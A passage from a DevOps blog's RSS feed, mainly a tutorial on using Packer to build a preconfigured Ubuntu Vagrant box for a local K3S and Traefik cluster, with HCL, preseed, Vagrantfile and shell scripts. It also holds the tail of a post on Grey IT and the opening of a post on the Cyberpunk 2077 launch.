It also means potentially having multiple applications that meet the same need.</li></ul><p>I can&#x2019;t count the number of times I&#x2019;ve been shown the newest trendy application, only to realize upon digging deeper that it&#x2019;s trendy but not at all usable in the current business context.</p><p>The most obvious example, in my opinion, is the case of Zoom. This application was a huge success at the beginning of the first lockdown, because it met real functional needs.</p><p>However, in terms of security, it was a disaster:</p><ul><li>No end-to-end encryption</li><li>Zoom bombing: the invasion of conferences by outsiders who can at best spoil your meeting, at worst remain discreet and conduct industrial espionage</li><li>Security flaws on user workstations allowing privilege escalation</li></ul><p>We talked about this last June in the <a href="https://open.spotify.com/episode/3uuY75Lrrht91kN91M6vWn?si=T6nSamQpT2u5LRPkEK4AYA&amp;ref=en.tferdinand.net">WeScale podcast</a> [FR Link]!</p><p>Thus, under a normal company process, it would simply have been refused in many companies (indeed, Zoom is still banned in many of them); nevertheless, it was used a lot, because it was adopted without following these processes in order to respond to a need faster.</p><h2 id="to-conclude">To conclude</h2><p>Having new needs is normal in a company. However, it is important to follow well-defined processes when adding a new application to your IS.</p><p>This is to secure your business and avoid simply losing value.</p><p>It is also important to have an up-to-date inventory of the applications used and available, to avoid adding applications when the needs are already covered. 
Often, the Grey IT cases I saw simply came from there.</p>]]></content:encoded></item><item><title><![CDATA[Create Vagrant boxes easily using Packer]]></title><description><![CDATA[<p>A few months ago, I wrote a post to explain how to easily create a local Kubernetes cluster leveraging Vagrant and Traefik. You can find it here:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://en.tferdinand.net/create-a-local-kubernetes-cluster-with-vagrant/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Create a local Kubernetes cluster with Vagrant</div><div class="kg-bookmark-description">Testing Kubernetes is quite easy thanks to solutions such as Minikube. However, when you want to</div></div></a></figure>]]></description><link>https://en.tferdinand.net/create-vagrant-boxes-easily-using-packer/</link><guid isPermaLink="false">6337ff9a65fbc6000155a56c</guid><category><![CDATA[packer]]></category><category><![CDATA[Vagrant]]></category><category><![CDATA[K3S]]></category><category><![CDATA[Traefik]]></category><category><![CDATA[IASC]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Mon, 11 Jan 2021 06:42:00 GMT</pubDate><media:content url="https://en.tferdinand.net/content/images/2022/01/packer.png" medium="image"/><content:encoded><![CDATA[<img src="https://en.tferdinand.net/content/images/2022/01/packer.png" alt="Create Vagrant boxes easily using Packer"><p>A few months ago, I wrote a post to explain how to easily create a local Kubernetes cluster leveraging Vagrant and Traefik. You can find it here:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://en.tferdinand.net/create-a-local-kubernetes-cluster-with-vagrant/"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Create a local Kubernetes cluster with Vagrant</div><div class="kg-bookmark-description">Testing Kubernetes is quite easy thanks to solutions such as Minikube. 
However, when you want to test cluster-specific features, such as load balancing or failover, it is not necessarily suitable anymore. It is possible to build your Kubernetes infrastructure on servers, or by using managed services&#x2026;</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://en.tferdinand.net/favicon.png" alt="Create Vagrant boxes easily using Packer"><span class="kg-bookmark-author">TFerdinand.net</span><span class="kg-bookmark-publisher">Teddy FERDINAND</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://en.tferdinand.net/content/images/2020/09/banner_k3s_cluster.jpg" alt="Create Vagrant boxes easily using Packer"></div></a></figure><p>Today, let&#x2019;s see how we can accelerate this creation by building the box used by Vagrant ourselves, preconfigured with our tools. This post is a continuation of the one above, so some notions will not be discussed again.</p><h2 id="what-is-packer">What is Packer?</h2><p>Packer is also a HashiCorp tool, like Vagrant. Its role is to package (hence its name) machine images.</p><p>It allows you to create AWS AMIs, Docker images, VirtualBox virtual machines and so on. You can find the complete list of providers managed by Packer here.</p><p>The main strengths of Packer are:</p><ul><li>The simplicity of the configuration: a simple JSON or HCL file can describe the desired build</li><li>Parallelization: you can create the same image on several providers in parallel, very useful in a multicloud approach</li><li>Reproducibility: it is easy to recreate an OS image from scratch using only the Packer files, which allows sharing just these files rather than large images</li></ul><p>Today, we will create a Vagrant box starting from the basic Ubuntu server ISO.</p><h2 id="why-use-packer-to-create-vagrant-boxes">Why use Packer to create Vagrant boxes?</h2><p>In my previous post, we saw how to quickly start a K3S cluster with Vagrant. 
However, on each virtual machine:</p><ul><li>I had to download K3S or Traefik</li><li>I had to do my SSH configuration (for the trust between nodes)</li><li>I couldn&apos;t make sure that the version of K3S and the set of binaries was exactly the same from one run to the next (I&apos;ll come back to this point)</li></ul><p>So, to solve this problem, I will use Packer to create boxes directly configured to meet my needs.</p><p>This will allow me to start my cluster more quickly, without having to download and configure everything at each launch.</p><h2 id="what-are-the-steps-to-create-the-box">What are the steps to create the box?</h2><p>First, we will create a configuration file for Packer. This file can be written in JSON or (since recently) in HCL, HashiCorp&apos;s own configuration language. For this project I arbitrarily chose HCL; note that JSON can describe exactly the same actions. This file will allow us to indicate the base ISO that we will use, as well as all the actions needed up to the creation of the box.</p><p>Then we will provide this configuration file as input to Packer, which will perform the following operations:</p><ul><li>Download the image of the requested OS</li><li>Check the checksum of the image</li><li>Create a virtual machine to launch the image</li><li>Execute the installation commands</li><li>Execute the machine provisioning commands</li><li>Shut down the VM</li><li>Export as a Vagrant box</li><li>Delete the temporary VM</li></ul><p>These operations will be done in a completely transparent way; on our side, we will only run one command.</p><h2 id="hands-in-the-mud">Hands in the mud!</h2><p>As a preamble, you can find all the scripts described below in the associated repository:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/teddy-ferdinand/packer-vagrant-k3s-cluster?ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">GitHub - 
teddy-ferdinand/packer-vagrant-k3s-cluster</div><div class="kg-bookmark-description">Contribute to teddy-ferdinand/packer-vagrant-k3s-cluster development by creating an account on GitHub.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.com/fluidicon.png" alt="Create Vagrant boxes easily using Packer"><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">teddy-ferdinand</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opengraph.githubassets.com/8c41b285f17de22f1f1875b62abe3bc26cc7764238d660cf4ab34536c2eb38d5/teddy-ferdinand/packer-vagrant-k3s-cluster" alt="Create Vagrant boxes easily using Packer"></div></a></figure><p>First, you will need Packer and Vagrant. For Vagrant, I invite you to look at my previous post to see how to install it. For Packer, I invite you to look at the dedicated page on the vendor&apos;s website for the installation best suited to your operating system.</p><p>To make my box, I chose to have three files:</p><pre><code>&#x251C;&#x2500;&#x2500; http
&#x2502;   &#x2514;&#x2500;&#x2500; preseed.cfg
&#x251C;&#x2500;&#x2500; packer_installer.sh
&#x2514;&#x2500;&#x2500; packer.pkr.hcl</code></pre><p>So we have:</p><ul><li>An http directory: this directory will be exposed as a web server by Packer, in order to perform a network installation that preconfigures the OS. I will come back to this point in the configuration.</li><li>A packer_installer.sh script: this script contains the basic provisioning of the image, e.g., the installation of K3S, Traefik and the deployment of my SSH keys</li><li>A configuration file packer.pkr.hcl: the configuration file that we will give to Packer to create our box. Warning: the .pkr.hcl extension is necessary for Packer to detect the right format; otherwise it will try to process it as JSON.</li></ul><h2 id="the-packer-configuration">The Packer configuration</h2><p>Let&apos;s start with the Packer configuration file. This is the file that will define our box.</p><p>First, we have the source section. As its name indicates, this element allows us to indicate which image to start from for the build, as well as the basic configuration (login, commands to be executed at boot time, etc.).</p><pre><code class="language-hcl">source &quot;virtualbox-iso&quot; &quot;ubuntu&quot; {
  guest_os_type = &quot;Ubuntu_64&quot;
  iso_url = &quot;http://cdimage.ubuntu.com/ubuntu/releases/bionic/release/ubuntu-18.04.5-server-amd64.iso&quot;
  iso_checksum = &quot;sha256:8c5fc24894394035402f66f3824beb7234b757dd2b5531379cb310cedfdf0996&quot;
  ssh_username = &quot;packer&quot;
  ssh_password = &quot;packer&quot;
  ssh_port= 22
  shutdown_command = &quot;echo &apos;packer&apos; | sudo -S shutdown -P now&quot;
  http_directory = &quot;http&quot;
  guest_additions_mode = &quot;disable&quot;
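  # (Sketch, not in the original build) Resource sizing for the temporary
  # build VM; the virtualbox-iso builder accepts these options in recent
  # Packer versions. Uncomment and adjust if the defaults are too small.
  # memory = 2048
  # cpus   = 2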
  boot_command = [
        &quot;&lt;esc&gt;&lt;wait&gt;&quot;,
        &quot;&lt;esc&gt;&lt;wait&gt;&quot;,
        &quot;&lt;enter&gt;&lt;wait&gt;&quot;,
        &quot;/install/vmlinuz&quot;,
        &quot; auto&quot;,
        &quot; console-setup/ask_detect=false&quot;,
        &quot; console-setup/layoutcode=us&quot;,
        &quot; console-setup/modelcode=pc105&quot;,
        &quot; debconf/frontend=noninteractive&quot;,
        &quot; debian-installer=en_US&quot;,
        &quot; fb=false&quot;,
        &quot; initrd=/install/initrd.gz&quot;,
        &quot; kbd-chooser/method=us&quot;,
        &quot; keyboard-configuration/layout=USA&quot;,
        &quot; keyboard-configuration/variant=USA&quot;,
        &quot; locale=en_US&quot;,
        &quot; netcfg/get_domain=vm&quot;,
        &quot; netcfg/get_hostname=packer&quot;,
        &quot; grub-installer/bootdev=/dev/sda&quot;,
        &quot; noapic&quot;,
        &quot; preseed/url=http://{{ .HTTPIP }}:{{ .HTTPPort }}/preseed.cfg&quot;,
        &quot; -- &quot;,
        &quot;&lt;enter&gt;&quot;
      ]
}
</code></pre><p>In this part, we find:</p><ul><li>The base image: Ubuntu 18.04.5</li><li>The checksum of the image, which will allow Packer to verify the integrity of the image after downloading it</li><li>The SSH login and password to use (which will be used in the second part)</li><li>The command to run to shut down the machine properly</li><li>The http directory, which exposes a preseed file carrying the basic configuration of my image. You can find it on line 32.</li><li>The option disabling the installation of the guest additions. The guest additions allow better integration between the host and the VM; in our case, I don&apos;t need them, so I might as well not install them.</li><li>Finally, the commands launched at boot time. These commands are run in &quot;emulation&quot; mode, meaning that Packer will emulate a keyboard to type them into your virtual machine.</li></ul><p>Concerning the commands launched at build time, I was inspired by a repository containing basic Packer configurations:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/geerlingguy/packer-boxes?ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">GitHub - geerlingguy/packer-boxes: Jeff Geerling&#x2019;s Packer build configurations for Vagrant boxes.</div><div class="kg-bookmark-description">Jeff Geerling&#x2019;s Packer build configurations for Vagrant boxes. 
- GitHub - geerlingguy/packer-boxes: Jeff Geerling&#x2019;s Packer build configurations for Vagrant boxes.</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.com/fluidicon.png" alt="Create Vagrant boxes easily using Packer"><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">geerlingguy</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://opengraph.githubassets.com/2934f457b2515f6b7f6ce775b8b6ca418f26f1f4fbb268b56277ef1567c6a567/geerlingguy/packer-boxes" alt="Create Vagrant boxes easily using Packer"></div></a></figure><p>Still in this same configuration file, we have a second block, the &quot;builder&quot;. As its name indicates, the role of this block is to build our box. Let&apos;s see its content.</p><pre><code class="language-hcl">build {
    sources = [&quot;source.virtualbox-iso.ubuntu&quot;]

    provisioner &quot;file&quot;{
        sources = [&quot;.ssh/id_rsa&quot;, &quot;.ssh/id_rsa.pub&quot;]
        destination = &quot;/tmp/&quot;
    }

    provisioner &quot;shell&quot;{
        script = &quot;./packer_installer.sh&quot;
        execute_command = &quot;echo &apos;packer&apos; | sudo -S -E sh -c &apos;{{ .Vars }} {{ .Path }}&apos;&quot;
    }

    post-processor &quot;vagrant&quot; {
        keep_input_artifact = false
        provider_override = &quot;virtualbox&quot;
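        # (Assumption, not in the original file) The vagrant post-processor
        # also accepts a templated &quot;output&quot; option to name the box file:
        # output = &quot;packer_ubuntu_{{ .Provider }}.box&quot;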
    }
}</code></pre><p>Those who are used to HCL will see that the source is a direct reference. This means that Packer natively resolves the dependency between the two elements.</p><p>Then we can see that I use &quot;provisioners&quot;; the role of these elements is precisely to handle provisioning, and there are dozens of them. It is for example possible to use Ansible for the configuration.</p><p>You can find the complete list of provisioners here: <a href="https://www.packer.io/docs/provisioners?ref=en.tferdinand.net">https://www.packer.io/docs/provisioners</a>.</p><p>For my part, I chose to use two of them:</p><ul><li>I copy the SSH keys that I generated into my virtual machine</li><li>I then run an installation script that I wrote; note the invocation of sudo for the launch, since by default Packer runs the commands as the user specified in the source</li></ul><p>Finally, I have a &quot;post-processor&quot;; the role of this element is to export my box once the configuration of my virtual machine is finished. In my case, the export is Vagrant, which means that Packer will create a Vagrant box from the VirtualBox virtual machine. As with providers and provisioners, there are many post-processors: <a href="https://www.packer.io/docs/post-processors?ref=en.tferdinand.net">https://www.packer.io/docs/post-processors</a></p><h3 id="the-installation-script">The installation script</h3><p>As we have seen above, I have a small shell script that is invoked to perform the provisioning of my machine. Here is the content of this script, which is quite basic.</p><pre><code class="language-bash">#!/bin/sh
# Deploy keys to allow all nodes to connect to each other as root
mkdir /root/.ssh/
mv /tmp/id_rsa*  /root/.ssh/

chmod 400 /root/.ssh/id_rsa*
chown root:root  /root/.ssh/id_rsa*

cat /root/.ssh/id_rsa.pub &gt;&gt; /root/.ssh/authorized_keys
chmod 400 /root/.ssh/authorized_keys
chown root:root /root/.ssh/authorized_keys

# Install updates and curl
apt update
apt install -y curl
# Apt cleanup.
apt autoremove -y
apt update

# Blank the netplan machine-id (DUID) so machines get a unique ID generated on boot.
truncate -s 0 /etc/machine-id
rm /var/lib/dbus/machine-id
ln -s /etc/machine-id /var/lib/dbus/machine-id

# Download k3s
curl -L https://get.k3s.io -o /home/packer/k3s
chmod +x /home/packer/k3s

# Download Traefik
curl -L https://github.com/containous/traefik/releases/download/v2.2.11/traefik_v2.2.11_linux_amd64.tar.gz -o /home/packer/traefik.tar.gz
cd /home/packer
tar xvfz ./traefik.tar.gz
rm ./traefik.tar.gz
chmod +x /home/packer/traefik</code></pre><p>First, we find the deployment of my SSH keys. Previously, Vagrant did this installation; now Packer does it for us. This will also allow us to connect directly using these keys.</p><p>Then I update my packages and install curl, because the image I use is a &quot;minimal&quot; image without this package. I then remove unneeded packages; besides giving a cleaner installation, this reduces the size of my box.</p><p>A small cleanup is then done so that our machine does not keep an identifier linked to it, a very important point for Vagrant; without it, we can get conflicts between our virtual machines.</p><p>Finally, I download K3S and Traefik and put them in /home/packer, so that the provisioning scripts can use them directly.</p><h3 id="the-preseed-file">The preseed file</h3><p>This file is probably the most &quot;raw&quot;, but it is very important, because it is the one that performs the base installation of our machine.</p><pre><code class="language-cfg">
d-i base-installer/kernel/override-image string linux-server
d-i clock-setup/utc boolean true
d-i clock-setup/utc-auto boolean true
d-i finish-install/reboot_in_progress note
d-i grub-installer/only_debian boolean true
d-i grub-installer/with_other_os boolean true
d-i partman-auto/disk string /dev/sda
d-i partman-auto-lvm/guided_size string max
d-i partman-auto/choose_recipe select atomic
d-i partman-auto/method string lvm
d-i partman-lvm/confirm boolean true
d-i partman-lvm/confirm boolean true
d-i partman-lvm/confirm_nooverwrite boolean true
d-i partman-lvm/device_remove_lvm boolean true
d-i partman/choose_partition select finish
d-i partman/confirm boolean true
d-i partman/confirm_nooverwrite boolean true
d-i partman/confirm_write_new_label boolean true
d-i pkgsel/include string openssh-server cryptsetup build-essential libssl-dev libreadline-dev zlib1g-dev linux-source dkms nfs-common
d-i pkgsel/install-language-support boolean false
d-i pkgsel/update-policy select none
d-i pkgsel/upgrade select full-upgrade
d-i time/zone string UTC
tasksel tasksel/first multiselect standard, ubuntu-server

d-i console-setup/ask_detect boolean false
d-i keyboard-configuration/layoutcode string us
d-i keyboard-configuration/modelcode string pc105
d-i debian-installer/locale string en_US.UTF-8

# Create packer user account.
d-i passwd/user-fullname string packer
d-i passwd/username string packer
d-i passwd/user-password password packer
d-i passwd/user-password-again password packer
d-i user-setup/allow-password-weak boolean true
d-i user-setup/encrypt-home boolean false
d-i passwd/user-default-groups packer sudo
d-i passwd/user-uid string 900
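
# (Optional sketch, not part of the original preseed) Passwordless sudo for
# the packer user, so provisioning would not need to pipe the password:
# d-i preseed/late_command string in-target sh -c &apos;echo &quot;packer ALL=(ALL) NOPASSWD: ALL&quot; &gt; /etc/sudoers.d/packer&apos;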
</code></pre><p>These include, but are not limited to:</p><ul><li>The configuration of the language and the keyboard layout</li><li>The partitioning of my disks</li><li>The basic packages to install</li><li>The creation of my &quot;packer&quot; user</li></ul><h2 id="lets-launch-it-all">Let&apos;s launch it all!</h2><p>Once we have all our files, we can launch the build of our Vagrant box with Packer with a simple:</p><pre><code>packer build packer.pkr.hcl</code></pre><p>As you can see below, this takes a few minutes and will perform all the actions I mentioned earlier.</p><figure class="kg-card kg-gallery-card kg-width-wide"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/Capture-du-2021-01-11-08-17-33-1.png" width="1270" height="1291" loading="lazy" alt="Create Vagrant boxes easily using Packer" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/Capture-du-2021-01-11-08-17-33-1.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/01/Capture-du-2021-01-11-08-17-33-1.png 1000w, https://en.tferdinand.net/content/images/2022/01/Capture-du-2021-01-11-08-17-33-1.png 1270w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/Capture-du-2021-01-11-08-17-54-1.png" width="1262" height="683" loading="lazy" alt="Create Vagrant boxes easily using Packer" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/Capture-du-2021-01-11-08-17-54-1.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/01/Capture-du-2021-01-11-08-17-54-1.png 1000w, https://en.tferdinand.net/content/images/2022/01/Capture-du-2021-01-11-08-17-54-1.png 1262w" sizes="(min-width: 720px) 720px"></div></div></div></figure><p>Once it is finished, we have a &quot;packer_ubuntu_virtualbox.box&quot; file in our current directory. 
During the execution, we can see the VirtualBox window; this is a choice I made. It is possible to disable its display by adding</p><pre><code>headless = true</code></pre><p>in my source.</p><h2 id="using-this-box-in-vagrant">Using this box in Vagrant</h2><p>Now that my box is created, I can use it in Vagrant. The basic scripts are very similar to the original ones, except that:</p><ul><li>I no longer start from a public Ubuntu box, but from my local box</li><li>I no longer need to deploy my RSA keys</li><li>I connect via the RSA key instead of the native Vagrant login</li><li>I no longer need to download K3S and Traefik</li><li>I disable the synchronization of the Vagrant directory, which I don&apos;t use, since it requires the &quot;guest additions&quot; that I haven&apos;t installed</li></ul><p>So here is the file in question:</p><pre><code class="language-hcl">MASTER_COUNT = 3
NODE_COUNT = 3
IMAGE = &quot;packer_ubuntu_virtualbox.box&quot;
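# (Note/assumption) Depending on the Vagrant version, a local .box file may
# need to be registered once before use, e.g.:
#   vagrant box add packer_ubuntu packer_ubuntu_virtualbox.box
# and then referenced here by name (&quot;packer_ubuntu&quot;) instead of the file path.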

Vagrant.configure(&quot;2&quot;) do |config|

  (1..MASTER_COUNT).each do |i|
    config.vm.define &quot;kubemaster#{i}&quot; do |kubemasters|
      kubemasters.vm.box = IMAGE
      kubemasters.vm.hostname = &quot;kubemaster#{i}&quot;
      kubemasters.vm.network  :private_network, ip: &quot;10.0.0.#{i+10}&quot;
      kubemasters.vm.provision &quot;shell&quot;, path: &quot;scripts/master_install.sh&quot;
      kubemasters.ssh.username = &quot;root&quot;
      kubemasters.ssh.private_key_path = &quot;.ssh/id_rsa&quot;
      kubemasters.vm.synced_folder &apos;.&apos;, &apos;/vagrant&apos;, disabled: true
    end
  end

  (1..NODE_COUNT).each do |i|
    config.vm.define &quot;kubenode#{i}&quot; do |kubenodes|
      kubenodes.vm.box = IMAGE
      kubenodes.vm.hostname = &quot;kubenode#{i}&quot;
      kubenodes.vm.network  :private_network, ip: &quot;10.0.0.#{i+20}&quot;
      kubenodes.vm.provision &quot;shell&quot;, path: &quot;scripts/node_install.sh&quot;
      kubenodes.ssh.username = &quot;root&quot;
      kubenodes.ssh.private_key_path = &quot;.ssh/id_rsa&quot;
      kubenodes.vm.synced_folder &apos;.&apos;, &apos;/vagrant&apos;, disabled: true
    end
  end

  config.vm.define &quot;front_lb&quot; do |traefik|
      traefik.vm.box = IMAGE
      traefik.vm.hostname = &quot;traefik&quot;
      traefik.vm.network  :private_network, ip: &quot;10.0.0.30&quot;   
      traefik.vm.provision &quot;file&quot;, source: &quot;./scripts/traefik/dynamic_conf.toml&quot;, destination: &quot;/tmp/traefikconf/dynamic_conf.toml&quot;
      traefik.vm.provision &quot;file&quot;, source: &quot;./scripts/traefik/static_conf.toml&quot;, destination: &quot;/tmp/traefikconf/static_conf.toml&quot;
      traefik.vm.provision &quot;shell&quot;, path: &quot;scripts/lb_install.sh&quot;
      traefik.vm.network &quot;forwarded_port&quot;, guest: 6443, host: 6443
      traefik.ssh.username = &quot;root&quot;
      traefik.ssh.private_key_path = &quot;.ssh/id_rsa&quot;
      traefik.vm.synced_folder &apos;.&apos;, &apos;/vagrant&apos;, disabled: true
  end
end
</code></pre><p>As you can see, no huge changes here from my original script.</p><p>The real changes are in the Vagrant deployment scripts.</p><h2 id="k3s-installation">K3S installation</h2><h3 id="installing-the-master">Installing the master</h3><pre><code class="language-bash">#!/bin/sh

# Add current node in  /etc/hosts
echo &quot;127.0.1.1 $(hostname)&quot; &gt;&gt; /etc/hosts

# Get the current IP address to launch K3S
current_ip=$(/sbin/ip -o -4 addr list enp0s8 | awk &apos;{print $4}&apos; | cut -d/ -f1)

# If we are on the first node, launch k3s with cluster-init; otherwise we join the existing cluster
if [ $(hostname) = &quot;kubemaster1&quot; ]
then
    export INSTALL_K3S_EXEC=&quot;server --cluster-init --tls-san $(hostname) --bind-address=${current_ip} --advertise-address=${current_ip} --node-ip=${current_ip} --no-deploy=traefik&quot;
    export INSTALL_K3S_VERSION=&quot;v1.16.15+k3s1&quot;
    sh /home/packer/k3s
else
    echo &quot;10.0.0.11  kubemaster1&quot; &gt;&gt; /etc/hosts
    scp -o StrictHostKeyChecking=no root@kubemaster1:/var/lib/rancher/k3s/server/token /tmp/token
    export INSTALL_K3S_EXEC=&quot;server --server https://kubemaster1:6443 --token-file /tmp/token --tls-san $(hostname) --bind-address=${current_ip} --advertise-address=${current_ip} --node-ip=${current_ip} --no-deploy=traefik&quot;
    export INSTALL_K3S_VERSION=&quot;v1.16.15+k3s1&quot;
    sh /home/packer/k3s
fi

# Wait for node to be ready and disable deployments on it
sleep 15
kubectl taint --overwrite node $(hostname) node-role.kubernetes.io/master=true:NoSchedule
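</code></pre><p>As a more robust alternative to the fixed sleep, one could poll until the node actually reports Ready. This is a sketch on my side, not part of the original script:</p><pre><code class="language-bash"># Poll the API until the current node shows up as Ready (alternative to the fixed sleep)
until kubectl get node $(hostname) 2&gt;/dev/null | grep -q &apos; Ready&apos;; do
    sleep 2
done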
</code></pre><p>As you can see, no more key deployment and no more K3S download. I just configure my host and launch K3S directly, since it is already present in my box.</p><p>The command-line arguments (INSTALL_K3S_EXEC) are exactly the same.</p><div class="kg-card kg-callout-card kg-callout-card-green"><div class="kg-callout-emoji">&#x26A0;&#xFE0F;</div><div class="kg-callout-text">Note on the K3S version<br><br>You may notice that I pin the K3S version using the INSTALL_K3S_VERSION environment variable; this is because recent versions of K3S default to RSA key authentication, which I could not get to work with Traefik. Even with the right password, I couldn&apos;t get basic authentication to work either. So I chose to point to the version I used last September for this post.<br><br>I&apos;ll probably do a post on this point when I&apos;ve found a solution.</div></div><h3 id="installation-of-worker-nodes">Installation of worker nodes</h3><pre><code class="language-bash">#!/bin/sh
# Add the current node to /etc/hosts
echo &quot;127.0.1.1 $(hostname)&quot; &gt;&gt; /etc/hosts

# Add kubemaster1 to /etc/hosts
echo &quot;10.0.0.11  kubemaster1&quot; &gt;&gt; /etc/hosts

# Get the current IP address to launch K3S
current_ip=$(/sbin/ip -o -4 addr list enp0s8 | awk &apos;{print $4}&apos; | cut -d/ -f1)

# Launch k3s as agent
scp -o StrictHostKeyChecking=no root@kubemaster1:/var/lib/rancher/k3s/server/token /tmp/token
export INSTALL_K3S_EXEC=&quot;agent --server https://kubemaster1:6443 --token-file /tmp/token --node-ip=${current_ip}&quot;
export INSTALL_K3S_VERSION=&quot;v1.16.15+k3s1&quot;
sh /home/packer/k3s
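</code></pre><p>To make the provisioning output more informative, a quick status check can be appended; this is a sketch of mine, assuming the standard k3s-agent systemd unit created by the installer:</p><pre><code class="language-bash"># Report whether the k3s agent service came up; dump recent logs if not
systemctl is-active k3s-agent || journalctl -u k3s-agent --no-pager | tail -n 20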
</code></pre><p>We find the same logic here: no more downloads, just basic host configuration and a direct launch of K3S.</p><h3 id="traefik-installation">Traefik installation</h3><p>The Traefik virtual machine setup comes down to launching the binary directly, using the configurations pushed by Vagrant.</p><pre><code class="language-bash">#!/bin/bash
# Run Traefik as a front load balancer
/home/packer/traefik --configFile=/tmp/traefikconf/static_conf.toml &amp;&gt; /dev/null&amp;
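</code></pre><p>Redirecting everything to /dev/null makes troubleshooting harder; a variant that keeps the logs could look like this (my own sketch, the log path is arbitrary):</p><pre><code class="language-bash"># Same launch, but keep Traefik&apos;s output in a log file for debugging
/home/packer/traefik --configFile=/tmp/traefikconf/static_conf.toml &amp;&gt; /var/log/traefik.log &amp;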
</code></pre><h2 id="we-run-the-whole-thing">We run the whole thing</h2><p>So we have everything we need to launch the deployment with Vagrant, with a simple</p><pre><code>vagrant up</code></pre><p>As in my previous post, after a few minutes my cluster is online. You can check that everything works with the following commands:</p><pre><code class="language-bash">source ./scripts/configure_kubectl.sh
kubectl get nodes 
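</code></pre><p>A couple of optional sanity checks can complete the picture; this is a sketch of mine, not part of the original post:</p><pre><code class="language-bash"># All system pods should eventually reach the Running state
kubectl get pods --all-namespaces

# The control plane endpoint should answer as well
kubectl cluster-info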
</code></pre><p>You should get output similar to this:</p><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/01/image-5.png" class="kg-image" alt="Create Vagrant boxes easily using Packer" loading="lazy" width="911" height="287" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/image-5.png 600w, https://en.tferdinand.net/content/images/2022/01/image-5.png 911w" sizes="(min-width: 720px) 720px"></figure><h3 id="to-conclude">To conclude</h3><p>This article only covers a very basic use of Packer. The tool is very powerful and enables multi-provisioning approaches in a very simple way. Moreover, the strength of Packer, like most infrastructure-as-code tools, is its reproducibility: it is very easy to recreate identical base images without having to share files of several hundred MB.</p><p>Like many of HashiCorp&apos;s tools, the language is quite high level and very accessible. For my part, it took me an hour to build my first VM from scratch with Packer a few years ago.</p><p>Don&apos;t hesitate to react via the comments if you have any questions or remarks!</p>]]></content:encoded></item><item><title><![CDATA[Cyberpunk 2077: Analysis of an agile method failure]]></title><description><![CDATA[<p>On December 10th, one of the most anticipated games of the year was released: Cyberpunk 2077.</p><p>Personally, I enjoy playing it, but that&#x2019;s not the case for everyone.</p><p>With an outside look of an IT professional, I suggest you see today the &#x201C;mistakes&#x201D; that I think</p>]]></description><link>https://en.tferdinand.net/cyberpunk-2077-analysis-of-an-agile-method-failure/</link><guid isPermaLink="false">6337ff9a65fbc6000155a56b</guid><category><![CDATA[actuality]]></category><category><![CDATA[DevOps]]></category><category><![CDATA[Point of view]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Thu, 24 Dec 2020 06:20:00 GMT</pubDate><media:content 
url="https://en.tferdinand.net/content/images/2022/01/20201218202529_1-1.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://en.tferdinand.net/content/images/2022/01/20201218202529_1-1.jpg" alt="Cyberpunk 2077: Analysis of an agile method failure"><p>On December 10th, one of the most anticipated games of the year was released: Cyberpunk 2077.</p><p>Personally, I enjoy playing it, but that&#x2019;s not the case for everyone.</p><p>With the outside eye of an IT professional, I suggest we look today at the &#x201C;mistakes&#x201D; that I think were made in this project, and how some of them could have been avoided. This article is not about the game itself, but rather about the organizational and technical aspects.</p><h2 id="a-little-background">A little background</h2><h3 id="the-studio">The studio</h3><p>Cyberpunk is developed by CD Projekt Red, a rather small Polish studio (by the standards of the industry&#x2019;s current titans). It is a company of about 800 people (according to their website). It is the studio behind the critically acclaimed The Witcher franchise, most recently adapted into a series by Netflix.</p><p>It also owns the GOG.com platform, bought a few years ago to sell games from independent studios. GOG stands out for its model of selling games without DRM (copy protection), which can sometimes cause problems.</p><p>It is a company that historically worked on a single license: The Witcher.</p><h3 id="the-game">The game</h3><p>Development of this game reportedly started in 2012, according to a press release at the time. The first teaser, released in 2013, did not specify a release date.</p><p>Developed largely out of the public eye, with little information released over the years, the game resurfaced at E3 2018 (the video game mecca). 
A first video offering an overview of the game was then presented.</p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/vjF9GgrY9c0?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></figure><p>Initially scheduled for April 16, 2020, the release was postponed three times: first to September 17, 2020, then to October 27, 2020, before finally landing on December 10, 2020.</p><p>The development of the game reportedly cost about 270 million euros, one of the most expensive budgets in the video game industry, similar in scale to GTA V, for example.</p><p>However, its release was quite catastrophic for the image of the studio: the game seems poorly finished, and one feels that some elements have been &#x201C;botched&#x201D;. Worse, the game is unplayable on PS4 and Xbox One, the consoles that existed when development began. The game is riddled with more or less blocking bugs.</p><p>Also, the game doesn&#x2019;t really look like the trailers presented earlier: it seems much more rigid, with the player having much less freedom than announced, especially regarding character customization.</p><p>This had several impacts:</p><ul><li>Removal of the game from online stores</li><li>Massive refund campaign</li><li>Huge impact on the company&#x2019;s 